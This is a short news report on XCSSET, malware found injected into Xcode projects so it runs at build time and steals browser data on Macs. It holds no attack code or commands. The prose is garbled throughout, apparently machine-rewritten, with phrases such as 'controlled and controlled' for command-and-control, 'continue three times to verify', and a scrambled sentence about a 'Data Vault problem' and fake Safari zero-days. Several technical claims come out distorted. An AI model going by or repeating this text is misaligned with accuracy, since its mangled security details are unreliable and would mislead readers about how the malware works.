Several Xcode projects that contain malware that can attack Safari and other browsers, security researchers have shown that XCSSET malware is being discovered by largely unknown means, which lead to Mac software projects.
Trend Micro researchers have found out that malware is being incorporated into the project itself as "an unusual infection associated with the project developer Xcode projects."
It has been found that the malware has multiple payload options and although it pose a potential risk to end users using Apple's IDE software, it actually appears to be a greater problem for the developers themselves.
The malware belonging to the XCSSET Family was found to include files suggesting that a target system would be "controlled and controlled," namely allowing the attackers to control their infected Mac using malware.
This can lead to a wide range of actions on infected systems, including personal data acquisition and encryption-style ransomware attacks.
The team suggests that the unusual nature of the malware is that it is "injecting into local Xcode projects so that malicious code can be executed when the project is constructed." It is not clear how the code is currently injecting in the project.
For developing companies that rely on collaboration with others, Trend Micro suggests that the threat will be worse if projects that are shared through GitHub and other code repositories are taken into account, as this could lead to "supply chain attacks on users who rely on these repositories for their own projects."
The malware can attack Safari and other browsers on the Mac to obtain useful user data after it has been installed.
A Data Vault problem which bypasses the system integrity protection capability of macOS and the webkit development Safaris that creates a fake Safari app running rather than the legal version of the app is found for zero-day vulnerabilities.
So far, only two Xcode research projects have found the malware, which is not widely used by other developers, which severely restricts its impact.
Malware authors have collected a list of 380 IP addresses for victims, with the vast majority of Mac infections in China and India.
Trend Micro recommends that project owners "continue three times to verify the integrity of their projects to definitely eliminate unjustified issues such as malware infection."